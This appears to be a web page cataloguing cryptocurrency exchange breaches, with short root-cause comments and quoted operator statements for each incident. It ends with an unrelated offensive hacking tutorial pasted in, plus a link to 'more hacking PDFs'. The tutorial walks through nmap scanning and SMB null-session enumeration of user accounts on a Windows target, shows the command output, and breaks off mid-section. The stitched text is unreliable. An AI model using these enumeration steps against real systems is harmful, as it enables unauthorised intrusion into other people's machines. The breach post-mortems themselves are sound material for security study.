Blockchain Graveyard – How did cryptocurrency exchanges get hacked?

Incident Briefs

  • Coindash

    CoinDash appears to be victimized by a hacked website, which a supposed adversary swapped out a funding address with a malicious address immediately after a token sale was launched.

    Contributors that sent ETH to the fraudulent Ethereum address, which was maliciously placed on our website, and sent ETH to the CoinDash.io official address will receive their CDT tokens accordingly. Transactions sent to any fraudulent address after our website was shut down will not be compensated.

    It is unfortunate for us to announce that we have suffered a hacking attack during our Token Sale event. During the attack $7 Million were stolen by a currently unknown perpetrator. The CoinDash Token Sale secured $6.4 Million from our early contributors and whitelist participants and we are grateful for your support and contribution.

  • Bithumb

    (Will update post when more thorough information is available. For now, view bravenewcoin.com

    “The employee PC, not the head office server, was hacked. Personal information such as mobile phone and email address of some users were leaked. However, some customers were found to have been stolen from because of the disposable password used in electronic financial transactions.”

  • ZCoin

    Due to a programming error in the implementation of Zerocoin, an attacker was able to exploit a single proof to generate multiple spends they could send to an exchange, in which the attackers then sold and withdrew funds.

    Significant documentation on the breach is available.

    From what we can see, the attacker (or attackers) is very sophisticated and from our investigations, he (or she) did many things to camouflage his tracks through the generation of lots of exchange accounts and carefully spread out deposits and withdrawals over several weeks. We estimate the attacker has created about 370,000 Zcoins which has been almost completely sold except for about 20,000+ Zcoin and absorbed on the market with a profit of around 410 BTC. In other words, the damage has already been mostly absorbed by the markets.

  • Bitcurex

    Most information related to this breach is in Polish. Bitcurex warned users not to use previous deposit addresses, which indicates a breach. No information on a root cause is easily available.

    Follow up investigation of the blockchain is mostly done by Polish bitcoin press, which estimates a 2300BTC loss.

  • Bitfinex

    This is Bitfinex’s second appearance in the graveyard.

    All below information is inferred or directly from reddit comments of Bitfinex employees. Employees repeatedly offer insight in comments that an internal breach allowed an attacker to interact with their BitGo implementation, and that BitGo’s security was not compromised.

    Bitfinex suggests in these comments that several withdrawal limits existed per user and system wide, and employees are unsure how they were bypassed.

    BitGo is a multisignature solution that heavily protects loss from a single key material breach. This approach greatly mitigates many of the risks associated with BTC, but still has a burden of securely storing API secrets or taking advantage of mitigations available to them in API implementation.

    At the end of the day, an application interacts with an API that signs transactions.

    The victims have strongly cleared BitGo of fault, it appears Bitfinex may not have taken advantage of (or incorrectly used) the security controls available to them through the BitGo API.

    Employees have also stated that per user, HD wallets backed by the BitGo API were used in lieu of any truly offline cold storage solution. This implementation suggests that authentication to BitGo’s API was “warm” or “hot” leaving API and signing keys to reside on servers that could be remotely accessed by an attacker. It was also suggested that every Bitfinex BTC holder used this approach, meaning vulnerability carried 100% risk of bitcoin loss across the board.

    It’s not currently suggested how servers were accessed for an attacker to position themselves into an attack like this, but will update if that becomes available.

    We are investigating the breach to determine what happened, but we know that some of our users have had their bitcoins stolen. We are undertaking a review to determine which users have been affected by the breach. While we conduct this initial investigation and secure our environment, bitfinex.com will be taken down and the maintenance page will be left up.

  • The DAO

    While technically an application vulnerability, this breach is interesting in that the vulnerability was within an Ethereum Contract. This has made the ability to patch or restore funds a very dramatic and unique situation involving miner consensus and the philosophy of ethereum’s purpose as a technology. Hard and Soft forks were considered with contention to reverse the attack.

    An attack has been found and exploited in the DAO, and the attacker is currently in the process of draining the ether contained in the DAO into a child DAO. The attack is a recursive calling vulnerability, where an attacker called the “split” function, and then calls the split function recursively inside of the split, thereby collecting ether many times over in a single transaction.

  • GateCoin

    This breach is unique in that it attacked Cold Storage.

    It is just as important to protect the deposits into cold storage as much as the cold storage itself. If cold storage deposit is modified, it’s as if you don’t have cold storage at all.

    We have previously communicated the fact that most clients’ crypto-asset funds are stored in multi-signature cold wallets. However, the malicious external party involved in this breach, managed to alter our system so that ETH and BTC deposit transfers by-passed the multi-sig cold storage and went directly to the hot wallet during the breach period. This means that losses of ETH funds exceed the 5% limit that we imposed on our hot wallets.

  • CoinKite

    Not much data available, but in a transition to shut down their wallet product, they somehow leaked a password database.

    While we were turning off servers, disabling firewalls and cleaning up backup systems today, we may have leaked a copy of our database. Although passwords into Coinkite.com are not useful anymore, you can rest assured that passwords were salted and SHA256 hashed with 131,072 rounds. If you used the same password on other sites, as a precaution, you may want to consider changing those other accounts. It’s possible you will see spam to your related email addresses.

  • CoinWallet

    Application vulnerability due to a lack of input sanitation, type unknown, though it does reference a “database call” which implies some form of database injection like SQLi.

    Strangely, they claim that no coins were lost, though CoinWallet shut down anyway.

    It is with great regret that we announce the closure of CoinWallet.co.
    Our decision to close is based on several factors. Primarily, on the 6th of April we suffered a data breach.

    Despite our best efforts there was a small error in a part of our code that should have checked and sanitized user input on a recently added function. Checks were in place but the check was then subsequently not used to block the database call.

    Our backup security system kicked in as it was designed to and no coins were lost. We have since patched the vulnerability but are still trying to determine the extent of the breach. However it would be advised to change passwords on any other crypto related websites where you use the same password and username as coinwallet.co. We used encrypted and salted passwords but given enough time these should be assumed compromised.

    Effective immediately, we have reset all passwords, deleted all API keys, and halted the twitter Tip Bot.

    This incident prompted us to reassess the viability of running coinwallet.co and it was decided it is just not viable taking into consideration the risk, costs and time involved.

  • CoinTrader

    Not much data available, other than that it has completely shut down after a suspected breach.

    This issue is currently under investigation and it is our intention to have the balance of your account settled as soon as possible. We sincerely apologize for this unfortunate inconvenience and will keep you posted on the progress of this issue. In the meantime, we have halted deposits, withdrawals and trading activity until this matter has been resolved.

  • BitQuick

    Not much detail provided, and appears damage was fairly limited for unknown reasons.

    On Monday, March 14, 2016, our server fell victim to an attack that gave the attacker unauthorized administrative access. The breach was immediately noticed, and the server was shutdown to prevent any further damage. We are still performing a formal investigation to determine the attack vector, and specifically what information was obtained from the server. Due to additional security mechanisms in place, no funds were taken, and all ID’s (driver’s licenses, passports, etc.) and emails remain secured. Sellers were emailed withdrawal instructions Tuesday evening. All outstanding orders and withdrawals have been processed. Only 3% of all funds remain unclaimed.

  • ShapeShift.io

    Extremely detailed post-mortem’s available from this breach, involving an external hacker collaborating with an insider threat.

    On March 14th, ShapeShift had 315 Bitcoin stolen from its hot wallet. It was quickly discovered that an employee at that time had committed the theft. It was reported to relevant authorities, and a civil suit was opened against the individual. As we had quickly figured out who it was, and how to resolve it internally, we were able to keep the site running uninterrupted. We planned to get the stolen property returned, and thought that was the end of it.

  • Cryptsy

    Maliciously placed Application vulnerability after a dependency (Lucky7Coin) was backdoored by a malicious developer, and abused for months to pull off an attack.

    After a period of time of investigation it was found that the developer of Lucky7Coin had placed an IRC backdoor into the code of wallet, which allowed it to act as a sort of a Trojan, or command and control unit. This Trojan had likely been there for months before it was able to collect enough information to perform the attack.

  • Bips.me

    Very little information, other than that wallets were compromised.

    BIPS has been a target of a coordinated attack and subsequent security breached. Several consumer wallets have been compromised and BIPS will be contacting the affected users.

    Most of what was recoverable from our servers and backups has now been restored and we are currently working on retrieving more information to get a better understanding of what exactly happened, and most of all what can be done to track down who did it.

  • BitPay

    The attacker spearphished the CFO (with what looks to be a compromised email / server of someone else, this is unclear) and successfully acquired his credentials with a phishing page.

    These credentials were then used to communicate with the CEO and request multiple large transfers to the amount of $1.8 Million USD. A customer pointed out the fraud.

    Below is the root cause as pointed out by court documents.

    On or about December 11, 2014, Bryan Krohn, the CFO of Bitpay, received an email from someone purporting to be David Bailey of yBitcoin (a digital currency publication) requesting Mr. Krohn comment on a bitcoin industry document.

    Unbeknownst to Mr. Krohn, or anyone at Bitpay, Mr. Bailey’s computer had been illegally entered (i.e. “hacked”).

    The phony email sent by the person who hacked Mr. Bailey’s computer, directed Mr. Krohn to a website controlled by the hacker wherein Mr. Krohn provided the credentials for his Bitpay corporate email account.

    After capturing Mr. Krohn’s Bitpay credentials, the hacker used that information to hack into Mr. Krohn’s Bitpay email account to fraudulently cause a transfer of bitcoin.

    The hacker illegally hacked Mr. Krohn’s computer so he could use his or her computer to send false authorizations to Bitpay on December 11 and 12, 2014.

    It is this hacking which fraudulently caused the transfers of bitcoin and therefore the loss to Bitpay of bitcoin valued at $1,850,000 (the “Loss”).

    Bitpay cannot recapture the lost bitcoin.

  • Cloudminr.io

    An attacker defaced the cloudminr.io website with a “database for sale” message containing usernames and passwords.

    According to various reports, the site was hacked on or about July 7th, with the main page of the service being amended over the weekend to offer the sale of customer login and personal information, along with a CSV (comma separated values) taste-test of the details of 1,000 customers’ personal details by the hackers to demonstrate that they were the “real deal.”

  • Bitstamp

    If a leaked incident report is to be believed, a VBA script embedded in a Word document was delivered via social engineering tactics over Skype to several employees. This malware was detonated on a system administrator’s machine who also had access to wallet.dat files and wallet passwords. 18,866 BTC lost as deposits were stolen over the course of several days.

    Bitstamp experienced a security breach on Jan. 4th. Security of our customers’ bitcoin and information is a top priority for us, and as part of our stringent security protocol we temporarily suspended our services on January 5th. All bitcoin held with us prior to the temporary suspension of services starting on January 5 (at 9 a.m. UTC) are completely safe and will be honored in full. We are currently investigating and will reimburse all legitimate deposits to old wallet addresses affected by the breach after the suspension.

  • BitFinex

    A small hot wallet compromise, although uncertain how they were accessed.

    Dear Customer although we keep over 99.5% of users’ BTC deposits in secure multisig wallets, the small remaining amount in coins in our hot wallet are theoretically vulnerable to attack. We believe that our hot wallet keys might have been compromised and ask that all of our customer cease depositing cryptocurrency to old deposits addresses. We are in the process of creating a new hot wallet and will advise within the next few hours. Although this incident is unfortunate, its scale is small and will be fully absorbed by the company. Thanks a lot for your patience and comprehension. Bitfinex Team”

  • Allcrypt

    An attacker used a simple account takeover with multiple pivots to gain server access to a wallet.

    With administrative access to WordPress, the attacker was able to upload PHP based tools to explore the filesystem and discover stored secrets. From there, database credentials were accessed and another PHP based database tool was used to access a database and modify a off-chain ledger. The attacker then dodged double accounting systems by discovering loopholes around the purchase/sale of bitcoins.

    This deserves a full read and is one of the better post mortems in the graveyard.

    Around 8PM on Sunday (all times EDT) our marketing director’s blog account requested a password reset. Up until the writing of this post (Wednesday morning, 10am) we do not know how the thief managed to know the marketing director’s (will refer to this as MD from here) account. Our best guess is it was an educated guess based on info found (more on that in a moment). The MD saw this email come in, and forwarded it to myself, and another team member (a technical lead/temporary assistant support staff), letting us know what happened and that he did not request the password reset. I did not see the email at the time, as I was out, and it was not a huge red flag that would require a phone call. Once I returned home later, I saw the email, and logged into the server to double-check on things. That’s when I discovered the breach.

    Apparently, the thief had gained access to the tech assistant’s email account. That email was hosted on a private server (not gmail, yahoo, etc). We have no idea how the password was acquired. We spent a lot of time this week downloading password lists from torrents, tor sites, etc, and could find his password in none of the lists. He assures us he did not use the password in multiple places, and that it was a secure password. Our best guess is that it was a brute force attempt. The mail server he uses used the dovecot package for IMAP mail, which, for reasons we cannot comprehend, does NOT log failed password attempts by default. Because of this, at first, we believed that the hacker somehow had the person’s password. But we do not know, and there is no way to know at this point how the password was found.

  • Cryptoine

    Application vulnerability involving a race condition for multiple currencies at Cryptoine.

    According to a statement on the Cryptoine website, the firm claims that a “hacker found some race condition bug in our trading engine. Manipulation of orders gave him false balances.”

    In a further update, Cryptoine claims that the hack only targeted hot wallets, saying that “our hot wallets was [sic] drained, coins: bitcoin, litecoin, urocoin, dogecoin, bitcoinscrypt, magi, darkcoin, dogecoindark, cannabis” but promises that all coins they still have will be returned to users “in correspondingly smaller quantities.”

  • CAVirtex

    Not much detail, other than a database breach and it seems all customers were paid back.

    Effective immediately, CAVIRTEX intends to cease carrying on an active Bitcoin business and will be winding down its operations in an orderly manner. As a result, effective immediately, no new deposits will be accepted by CAVIRTEX. Trading on CAVIRTEX will be halted effective March 20, 2015. Effective March 25th, 2015, no withdrawals will be processed. CAVIRTEX will communicate with any account holders that continue to hold balances after March 25, 2015.

    We have maintained 100% reserves. CAVIRTEX is solvent and remains in a position to accommodate all customer withdrawal requests received prior to March 25, 2015. However, On February 15, 2015 we found reason to believe that an older version of our database, including 2FA secrets and hashed passwords, may have been compromised. This database did not include identification documents.

  • ExCoin

    Not much data, other than the name of a hacker and that they stole the entire wallet, shutting down ExCoin.

    February 6th and 10th, the user ‘Ambiorx’ was able to gain access to all the Bitcoins on the Exco.in exchange. As a result we no longer have the means necessary to continue operation and are deeply saddened to announce we will be shutting down operations this month. The trading engine has been disabled and Exco.in user accounts will remain active, with the exception of Ambiorx’s account and those who may be affiliated.

  • BTER

    Cloud infrastructure account takeover without a lot of detail.

    Several hours ago one of our hosting accounts was hacked and the hacker got 50m NXT from this server.
    It’s totally our fault and we are trying our best to cover all the loss. However 50m nxt is huge for us, we cannot afford it at the moment.

  • 796

    Not much information available, other than the victim stating that the hacker was putting a lot of effort towards their attack.

    We have been constantly monitoring the hacking activities on our servers and 3 months back then we took the precautionary step to migrate our servers to a highly secured cloud site. Unfortunately, that didn’t stop the incident from happening last night. In the last 24 hours, our security team worked around the clock to trace back the codes and processes. At this moment, we have a pretty good idea of exactly how they did it. This was not a generalized attack. The hacker’s strategy was precisely calculated and well targeted to compromise a certain weakness on our server.

  • BitTrader

    Not much data available, other than that a hacker supposedly stole a wallet and then extorted the operator for further funds.

    While preparing for the final audit results, a task we were working on for weeks now, our bitcoin wallet has been hacked and emptied, just after exchanging our fiat holdings within the exchanges to bitcoin and transferring our entire holdings to our wallet, in order to proof our solvency.

    It is a known fact that I personally opposed any proof of solvency, but agreed to conduct it for the sake of a few dozen small and medium investors.

    The hacker contacted me shortly after he took advantage of our holdings and demanded a ransom in order to transfer the coins back. I have agreed to a 25% ransom of the entire sum, but haven’t heard back from him for several days now.

  • CryptoThrift

    Very traditional application vulnerability (SQL injection) that was brought in by a third party library. This modified their “escrow” product.

    Whilst we have not yet completed our investigation, we have identified the attack vector as a vulnerability in a third party plugin. This was used to inject SQL queries into our database and manipulate the amounts on transactions being released from escrow. What we have not made public until now is that we have seen sustained and almost-daily attack attempts on the site for many months. We have been in contact with the Australian Federal Police regarding this, and will be sharing with them all data that we have on this attack as well as all previous attempts.

  • MintPal

    Little information provided.

    A few hours ago we were unfortunately the subject of a successful attack against the exchange. Our investigations have shown that whilst our security was breached, VeriCoin was the target. We would like to stress that VeriCoin and the VeriCoin network has not been in any way compromised. We have worked to secure the exchange and the withdraw process from any further attack.

  • DogeVault

    Little information provided, though the attackers seemed to have accessed the DogeVault servers and accessed a wallet directly.

    We regret to announce that on the 11th of May, attackers compromised the Doge Vault online wallet service resulting in wallet funds being stolen. After salvaging our wallet we have ascertained that around 280 million Dogecoins were taken in the attack, out of a total balance of 400 million kept in our hot wallet. 120 million Dogecoins have been since recovered and transferred to an address under our control. It is believed the attacker gained access to the node on which Doge Vault’s virtual machines were stored, providing them with full access to our systems. It is likely our database was also exposed containing user account information; passwords were stored using a strong one-way hashing algorithm. All private keys for addresses are presumed compromised, please do not transfer any funds to Doge Vault addresses.

  • coinex.pw

    Not enough information, other than a infrastructure intrusion that breached the wallet.

    Long story short: yes, our wallet server got hacked and all funds were withdrawn.

  • FlexCoin

    “Front End” flaw implies an application vulnerability involving transactions between users of their application. It sounds like a race condition given the use of thousands of requests that were necessary to deplete the wallet before the off-chain ledger could update.

    During the investigation into stolen funds we have determined that the extent of the theft was enabled by a flaw within the front-end. The attacker logged into the flexcoin front end from IP address 207.12.89.117 under a newly created username and deposited to address 1DSD3B3uS2wGZjZAwa2dqQ7M9v7Ajw2iLy. The coins were then left to sit until they had reached 6 confirmations. The attacker then successfully exploited a flaw in the code which allows transfers between flexcoin users. By sending thousands of simultaneous requests, the attacker was able to “move” coins from one user account to another until the sending account was overdrawn, before balances were updated.

  • Silk Road 2.0

    If you trust the operators, they blame the famous “[transaction malleability][1]” vulnerability.
    [1]: https://en.bitcoin.it/wiki/Transaction_Malleability

    Our initial investigations indicate that a vendor exploited a recently discovered vulnerability in the Bitcoin protocol known as “transaction malleability” to repeatedly withdraw coins from our system until it was completely empty.

  • Bid Extreme

    Very little information available.

    As a result of a hacker attack it was robbed portfolio BTC and LTC. This fact was reported to law enforcement authorities.

    They were stolen currency BTC and LTC belonging to all users. If they recover they will be returned to users in accordance with the state of the balance on the day 17.11.2013r.

  • inputs.io

    Cloud infrastructure account takeover. Some kind of 2FA bypass exploit as well. Source code, wallets, and user data exfiltrated by attacker.

    Two hacks totalling about 4100 BTC have left Inputs.io unable to pay all user balances. The attacker compromised the hosting account through compromising email accounts (some very old, and without phone numbers attached, so it was easy to reset). The attacker was able to bypass 2FA due to a flaw on the server host side. Database access was also obtained, however passwords are securely stored and are hashed on the client. Bitcoin backend code were transferred to 10;[email protected]:[email protected] (most likely another compromised server).

  • Vircurex

    Cloud infrastructure compromise. After an initial credential breach, the attacker escalated access through social engineering. The victim blames the hosting provider for violating their own procedure for password resets.

    The attacker has acquired login credentials to our VPS control account with our hosting service provider and has then asked for the root password reset of all servers which – unfortunately – the service provider has then done and posted the credentials in their helpdesk ticket, rather than the standard process of sending it to our email address (which has 2FA protection), also the security setup of allowing only our IP range to login to the management console was not working. It was an additional security feature the provider offered but was obviously circumvented by the attacker. As a result out of this incident we have moved all our services to a new provider who offers 2 factor authentication for all
    logins as well as other verification processes that we hope will make similar attempts impossible in the future

  • Bitcoin Central

    This was an account takeover on the victim’s cloud provider, allowing access to a server hosting a hot wallet. This was part of a larger breach.

    Someone managed to reset the password from our hosting provider web interface, this enabled the attacker to lock us out of the interface and request a reboot of the machine in ‘rescue’ mode. Using this, the attacker copied our hot wallet and sent away what was present.

    This very hosting provider (OVH) had been compromised a couple of days ago, in the exact same way, leading to loss of funds on mining.bitcoin.cz.

  • InstaWallet

    Given that a database was accessed, this was probably a breach of infrastructure. Their comment about being “impossible to reopen” makes me wonder if it was off-chain and if they couldn’t trust their ledger.

    The Instawallet service is suspended indefinitely until we are able to develop an alternative architecture. Our database was fraudulently accessed, due to the very nature of Instawallet it is impossible to reopen the service as-is.

  • Mercado Bitcoin

    This is a tough translation but it seems like a clear application vulnerability involving some kind of coupon code system.

    (Translated)

    The Bitcoin market suffered an attack, which unfortunately was successful in its implementation redeem code. Due to a coding error, it was possible for an attacker to generate new credit codes, without the value was properly charged to your final balance. Getting thus generate a false amount of bitcoins within the system and rescue him in time during the night.

  • BitInstant

    Attacker pivoted several times after initially gaining access to the victim’s domain registrar via social engineering. This then allowed a DNS hijack, allowing them to route password resets to the attacker. Attacker then took over cloud infrastructure hosting wallets.

    The attacker contacted our domain registrar at Site5 posing as me and using a very similar email address as mine, they did so by proxying through a network owned by a haulage company in the UK whom I suspect are innocent victims the same as ourselves. Armed with knowledge of my place of birth and mother’s maiden name alone (both facts easy to locate on the public record) they convinced Site5 staff to add their email address to the account and make it the primary login (this prevented us from deleting it from the account). We immediately realized what was going on, and logged in to change the information back. After changing this info and locking the attacker out, overnight he was able to revert my changes and point our website somewhere else. Site5 is denying any damages, but we suspect this was partly their fault.

    After gaining access, they redirected DNS by pointing the nameservers to hetzner.de in germany, they used hetzner’s nameservers to redirect traffic to a hosting provider in ukraine. By doing this, he locked out both my login and Gareths’s login and they used this to hijack our emails and reset the login for one exchange (VirWox), enabling them to gain access and steal $12,480 USD worth of BTC. No other exchanges were affected due to either Mult Factor Authentication, OTP, Yubikey’s and auto lockdowns.

    The hacker was also able to pull a few hours of internal company emails. However due to mandatory PGP encrytion between members of our company and tools like Cryptocat, sensitive information was not breached.

  • MT Gox

    The big one. Lots of speculation and not a lot of hard data. Everything from negligence, insider threat, and fraud has been speculated.

    On Monday night, a number of leading Bitcoin companies jointly announced that Mt. Gox, the largest exchange for most of Bitcoin’s existence, was planning to file for bankruptcy after months of technological problems and what appeared to have been a major theft. A document circulating widely in the Bitcoin world said the company had lost 744,000 Bitcoins in a theft that had gone unnoticed for years. That would be about 6 percent of the 12.4 million Bitcoins in circulation.

    Mark Karpeles, the former CEO of Mt. Gox, told the Daily Beast last month, “I suspect that some of the missing bit coins were taken by a company insider but when I tried to talk to the police about it, they seemed disinterested.

  • BitFloor

    Attackers likely gained access through a cloud infrastructure provider and accessed a server with unencrypted hot wallet.

    Last night, a few of our servers were compromised. As a result, the attacker gained accesses to an unencrypted backup of the wallet keys (the actual keys live in an encrypted area). Using these keys they were able to transfer the coins. This attack took the vast majority of the coins BitFloor was holding on hand. As a result, I have paused all exchange operations. Even tho only a small majority of the coins are ever in use at any time, I felt it inappropriate to continue operating not having the capability to cover all account balances for BTC at the time.

  • Bitcoinica

    Infrastructure breach with access to a large hot wallet.

    It is with much regret that we write to inform our users of a recent security breach at Bitcoinica. At approximately 1:00pm GMT, our live production servers were compromised by an attacker and they used this access to deplete our online wallet of 18547 BTC.

  • Slush’s Pool

    A breach at Linode was the root cause here and there’s plenty of information to understand the breach. Credentials for a customer support team member were used and eight Linode customers were compromised for having affliations to bitcoin.

    After accessing the customer support interface, the attacker was able to access the individual account interface for their victims and change root passwords on customer’s machines. To apply this root password change, servers were rebooted.

    A VP at Linode responded.

    Somebody hacked my backup machine with pool data hosted on Linode and steal 3094 BTC (“hot” coins ready for payouts). Cold backup was not affected in any way by this hack.

    It looks that also user database has been compromised. Although passwords are stored in SHA1 with salt, I strongly recommend to change your password on the pool immediately.

    Robery of Bitcoins has no impact to pool users, I’m covering the loss from my own income (although it means that many months of my work is wasted Roll Eyes ).

  • Bitcoin7

    Attackers made it onto Bitcoin7 infrastructure, due to wallets and database data being accessed. Given that “other websites” were owned, it’s possible a larger unknown shared hosting provider with other customers was compromised.

    On Oct 5th 2011 Bitcoin7.com became the victim of a number of pre-planned hacker attacks. While our investigation is still going, evidence reveals that the attacks originated from Russia and Eastern Europe.

    The attack itself took action not only against the bitcoin7.com server but also against other websites and servers which were part of the same network. Eventually the hackers managed to breach into the network which subsequently lead to a major breach into the bitcoin7.com website.

    As a result of the hacking, unknown individuals managed to gain full access to the site’s main bitcoin depository/wallet and 2 of the 3 backup wallets.

    In addition the hackers gained access to our user database.

  • MyBitcoin

    This sounds like an application vulnerability that allowed forged deposits that could eventually be withdrawn from a hot wallet. This sort of attack is more common with “off blockchain” wallets.

    After careful analysis of the intrusion we have concluded that the software that waited for Bitcoin confirmations was far too lenient. An unknown attacker was able to forge Bitcoin deposits via the Shopping Cart Interface (SCI) and withdraw confirmed/older Bitcoins. This led to a slow trickle of theft that went unnoticed for a few days. Luckily, we do keep a percentage of the holdings in cold storage so the attackers didn’t completely clean us out. Just to clarify, we weren’t “fully” hacked aka “rooted”. You can still trust our PGP, SSL, and Tor public keys.

  • Bitomat.pl

    The cause is very uncertain. The operator suspects a third party destroying a host on AWS, but it looks like operator error is highly possible due to the “breach” occurring during a major upgrade.

    (Translated)

    On 26 July 2011, at about 23:00 am, I have found the overloaded the Bitcoin server and I had to increase the RAM. As a result of this operation, the entire virtual machine was removed, and with it all the information, including the wallet and all of its backups. I have found that the data did not go into Nirvana because the Virtual Machine settings have >been changed, even though I have changed even nothing. Our Hoster, Amazon Web Services Company, indicates that the deleted machine was adjusted so that they are once you shut down irrevocably “destroyed” (including all data on the hard disks).

    I am still determine who changed the settings on the VM and whether it is possible to recover the deleted data. Unfortunately, the collaboration with Amazon Web Services (AWS) to be very difficult. Once I realized that the virtual machine is lost, I immediately ordered AWS premium support, talked to the manager and asked for protection of my data. So far without success.

    To this day I could not find out the exact reasons for the misery. I suspect the actions of third parties, which wanted to cover up their illegal activities, or even wanted to crash the whole service, responsible for them. Should my suspicions in that direction harden, I’ll go with the case to the police and prosecutor’s office. For this I need but the cooperation between AWS and which is (as mentioned above) currently very difficult. Efforts of data recovery are of course still in progress.

  • The Art of Grey-box attack

    More hacking PDFs
    https://thehiddenwiki.pw/files

    ######
    Info
    ######

    Title : The Art of Grey-Box Attack
    Author : ZeQ3uL (Prathan Phongthiproek)
    JabAv0C (Wiswat Aswamenakul)
    Team : CWH Underground [www.milw0rm.com/author/1456]
    Website : cwh.citec.us / www.citec.us
    Date : 2009-07-04

    ##########
    Contents
    ##########

    [0x00] – Introduction

    [0x01] – The Art of Microsoft Windows Attack

    [0x01a] – Scanning & Enumeration
    [0x01b] – Gaining Access
    [0x01c] – Escalating Privilege

    [0x02] – The Art of Unix/Linux Attack

    [0x02a] – Scanning & Enumeration
    [0x02b] – Gaining Access
    [0x02c] – Escalating Privilege

    [0x03] – Metasploit Ninja-Autopwned

    [0x03a] – Nmap+Metasploit Autopwned
    [0x03b] – Nessus+Metasploit Autopwned

    [0x04] – Client-Side Attack with Metasploit

    [0x04a] – Metasploit Payload Generator
    [0x04b] – MS-Office Macro Ownage
    [0x04c] – AdobeReader PDF Ownage

    [0x05] – References

    [0x06] – Greetz To

    #######################
    [0x00] – Introduction
    #######################

    Hi all, in this paper, we will guide you about methods to hacking into Windows
    system and linux system. Moreover, we also show the ways to use popular hacking tools,
    nmap and metasploit. Those tools are more powerfull than day in the past (We will see it ;D)

    We divide the paper into 7 sections from 0x00 to 0x06. However, only section 0x01 to
    0x04 are technical issue. Section 0x01, we show the steps to hack into Windows 2000 operating
    system. Section 0x02, we switch to talk about steps of linux hacking. The next section, 0x03,
    mentions about automatic exploiting by using metasploit combining with nmap or nessus.
    The last technical section lets you see examples of exploiting client software in order to
    get access to a system 😀

    ##############################################
    [0x01] – The Art of Microsoft Windows Attack
    ##############################################

    In this section, we talk about attacking Windows machines in network. We will start with scanning
    and enumeration then we move to gain access to Windows system and, finally, escalating privilege
    in order to control the machine completely and use the machine to attack other machines in the network.

    ++++++++++++++++++++++++++++++++++
    [0x01a] – Scanning & Enumeration
    ++++++++++++++++++++++++++++++++++

    First, start with scanning by using nmap (http://nmap.org) which is the best in our opinion.
    New version of nmap improves scanning speed, mappes port with service name and adds custom script feature
    which is perfect use for penetration testing.

    The first example, We use nmap to scan for openning ports which are the channels to attack the system:

    [Nmap Result]———————————————————————————–

    bt nmap-4.85BETA10 # nmap -sV 192.168.80.129

    Starting Nmap 4.85BETA10 ( http://nmap.org ) at 2009-07-03 10:03 GMT
    Warning: File ./nmap-services exists, but Nmap is using /usr/local/share/nmap/nmap-services for security and consistency reasons.
    set NMAPDIR=. to give priority to files in your local directory (may affect the other data files too).
    Interesting ports on 192.168.80.129:
    Not shown: 990 closed ports
    PORT STATE SERVICE VERSION
    80/tcp open http Microsoft IIS webserver 5.0
    135/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)
    139/tcp open netbios-ssn
    443/tcp open https?
    445/tcp open microsoft-ds Microsoft Windows 2000 microsoft-ds
    1025/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)
    1026/tcp open msrpc Microsoft Windows RPC
    1027/tcp open msrpc Microsoft Windows RPC
    1433/tcp open ms-sql-s Microsoft SQL Server 2000 8.00.194; RTM
    3372/tcp open msdtc?
    1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
    SF-Port3372-TCP:V=4.85BETA10%I=7%D=7/3%Time=4A4DD777%P=i686-pc-linux-gnu%r
    SF:(GetRequest,6,”\x18\xc1\n\0x\x01″)%r(RTSPRequest,6,”\x18\xc1\n\0x\x01″)
    SF:%r(HTTPOptions,6,”\x18\xc1\n\0x\x01″)%r(Help,6,”\x18\xc1\n\0x\x01″)%r(S
    SF:SLSessionReq,6,”\x18\xc1\n\0x\x01″)%r(FourOhFourRequest,6,”\x18\xc1\n\0
    SF:x\x01″)%r(LPDString,6,”\x18\xc1\n\0x\x01″)%r(SIPOptions,6,”\x18\xc1\n\0
    SF:x\x01″);
    MAC Address: 00:0C:29:CC:CF:46 (VMware)
    Service Info: OS: Windows

    Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 71.68 seconds

    [End Result]————————————————————————————

    From result, we get a list of opening ports and we know that this system runs IIS, Netbios, Endpoint Mapper, SMB, MSSQL2000
    and the operating system is Windows 2000 (We pick Windows 2000 as the example because we want you to see the big picture of
    Windows hacking). The next step is an information gathering from Netbios and SMB. Windows 2000 has “Null Session” vulnerability
    (Holygrail of Windows Vulnerability) which allows us to enumerate all accounts in the system including security policies,
    local group, file share. We pick nmap to gather the information by using Nmap-script. In the past, We had to connect to the system
    through IPC$ (Null Session) then we had run command [net use \\192.168.80.129 “” /u:””] after that we have enumerated the information through
    a tool such as Superscan4 or Winfo. Nowadays, Nmap(8.5Beta) can perform those tasks with help of Nmap-script (smb-enum-users, smb-enum-shares,Etc).

    [Nmap Result]———————————————————————————–

    bt nmap-4.85BETA10 # nmap –script=smb-enum-users 192.168.80.129

    Starting Nmap 4.85BETA10 ( http://nmap.org ) at 2009-07-03 10:21 GMT
    Warning: File ./nmap-services exists, but Nmap is using /usr/local/share/nmap/nmap-services for security and consistency reasons.
    set NMAPDIR=. to give priority to files in your local directory (may affect the other data files too).
    Interesting ports on 192.168.80.129:
    Not shown: 990 closed ports
    PORT STATE SERVICE
    80/tcp open http
    135/tcp open msrpc
    139/tcp open netbios-ssn
    443/tcp open https
    445/tcp open microsoft-ds
    1025/tcp open NFS-or-IIS
    1026/tcp open LSA-or-nterm
    1027/tcp open IIS
    1433/tcp open ms-sql-s
    3372/tcp open msdtc
    MAC Address: 00:0C:29:CC:CF:46 (VMware)

    Host script results:
    | smb-enum-users:
    |_ SERVER\Administrator, SERVER\backup, SERVER\epp, SERVER\epp_contractor, SERVER\Guest, SERVER\IUSR_SERVER, SERVER\IWAM_SERVER, SERVER\Jim, SERVER\John, SERVER\mary, SERVER\molly, SERVER\None, SERVER\TsInternetUser

    Nmap done: 1 IP address (1 host up) scanned in 0.63 seconds

    [End Result]————————————————————————————

    From Result, We know all user in target system:

    – Administrator
    – Backup
    – epp
    – epp_contractor
    – Guest
    – IUSR_SERVER
    – IWAM_SERVER
    – Jim
    – John
    – mary
    – molly
    – TsInternetUser

    The Others techniques is Enumeration from “LDAP Anonymous” and SNMP Default Community string (Public/Private) that we can list all user from target system too.
    “LDAP Anonymous” => Using ldapminer
    “Default SNMP Community String” => Using snmpwalk
    The shared files and folders are also important. If there is no properly permission setting, attack may directly upload malicious files to the system.

    [Nmap Result]———————————————————————————–

